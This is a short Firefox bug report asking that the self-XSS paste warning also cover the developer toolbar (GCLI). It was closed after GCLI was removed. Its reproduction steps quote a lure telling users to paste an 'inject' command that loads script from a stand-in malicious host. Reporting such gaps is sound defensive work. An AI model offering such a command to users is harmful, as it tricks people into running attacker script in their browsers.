Closed Bug 1319381 Opened 4 years ago Closed 2 years ago
The paste/dnd selfxss warning should also apply to the developer toolbar
STR: 1. tell user to copy/paste "inject 'http://malicious.com/foo.js'" into the GCLI to see people who unfriended them / what their facebook friends really think about them / etc. ER: nopenopenopenopenope AR: we just let it happen
I think a fix for bug 1319382 would probably work here too.
Priority: -- → P2
GCLI is going away with Firefox 62 (see bug 1461970). So there isn't a way to inject JS anymore in the way described here.
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.